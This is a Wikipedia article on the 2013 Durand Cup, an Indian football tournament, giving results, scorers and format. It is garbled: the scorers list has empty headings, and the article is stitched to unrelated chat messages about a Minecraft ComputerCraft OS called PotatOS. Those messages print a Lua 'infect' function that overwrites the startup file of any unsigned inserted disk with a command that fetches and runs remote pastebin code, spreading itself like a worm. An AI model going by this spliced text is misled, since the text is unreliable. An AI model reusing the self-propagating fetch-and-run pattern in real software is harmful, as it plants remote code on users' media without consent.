2013 Durand Cup

The 2013 Durand Cup was the 126th season of the Durand Cup, the third oldest football tournament in the world, which is a knock-out competition held in India. Air India were the current holders, having beaten Mumbai Tigers 3-2 on penalties after the match ended 0-0 after 120 minutes in the 2012 Final.[1]

2013 Durand Cup
Country India
Teams12
ChampionsMohammedan
Runners-upONGC
Matches played25
Goals scored63 (2.52 per match)
Top goal scorer(s) Bikash Jairu (7)
2012
2014

The tournament is held from 2 September to 19 September with all matches at the Ambedkar Stadium in New Delhi.

Preliminary round

2 September 2013 Air Force FC2 – 3Youngster ClubAmbedkar Stadium, Delhi
13:30 IST V.Kumar  69'
Mandeep  81'
A.Javed  31'
R.Negi  65'
A.Kataria  80'
2 September 2013 Assam Regiment Centre3 – 1CRPF FCAmbedkar Stadium, Delhi
15:45 IST R.Singh  8'
A.Swarna  12'
K.Singh  90+3'
Sugesh M  29'
3 September 2013 ASC Bangalore2 – 0Delhi UnitedAmbedkar Stadium, Delhi
13:30 IST Ramachandran  2', 32'
3 September 2013 Garhwal Heroes2 – 2 (a.e.t.)
(4 – 5 p)
Indian Navy FCAmbedkar Stadium, Delhi
15:45 IST M.Choudhary  42'
K.Rawat  68'
Riyad B  40', 46'
4 September 2013 Assam Regiment Centre2 – 1BSF FCAmbedkar Stadium, Delhi
13:30 IST R.Singh  42'
A.Swarna  53'
B.Singh  28'
4 September 2013 TATA FA0 – 1Youngster ClubAmbedkar Stadium, Delhi
15:30 IST A.Singh  54'
5 September 2013 Indian Navy FC1 – 0Kerala Police FCAmbedkar Stadium, Delhi
13:30 IST Riyad B  54'
5 September 2013 Assam Riffle1 – 1
(4 – 3 p)
ASC BangaloreAmbedkar Stadium, Delhi
15:30 IST D Mukhim  90+2' Ramachandran  88'
6 September 2013 Assam Regiment Centre0 – 0
(5 – 4 p)
Youngster ClubAmbedkar Stadium, Delhi
15:00 IST
7 September 2013 Indian Navy FC2 – 0Assam RiffleAmbedkar Stadium, Delhi
15:00 IST R.Rai  44'
P.Singh  74'

Quarter-Finals

The Quarter-Finals of the Durand Cup shall be played between 12 teams. Four of the teams currently played in 2012–13 I-League and four played in the 2013 I-League 2nd Division. The other four spots would have been taken up by the top two teams from the preliminary round plus two services team.

Semi-Finals

16 September 2013 Mumbai Tigers1 – 3MohammedanAmbedkar Stadium, Delhi
14:30 IST Jairu  82' Report Orji  2'
C.Abranches  45+1'
Soren  65'
17 September 2013 Indian Navy FC0 – 1ONGCAmbedkar Stadium, Delhi
14:30 IST Report Ezeh  63'

Final

19 September 2013 Mohammedan2 – 1ONGCAmbedkar Stadium, New Delhi
17:30 IST Soen  38'
Ozbey  45+2'
Report Lavino  57'

Scorers

All goals from tournament proper. Goals from qualifiers are not counted in this list.

7 goals
4 goals
3 goals
2 goals
1 goal

gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.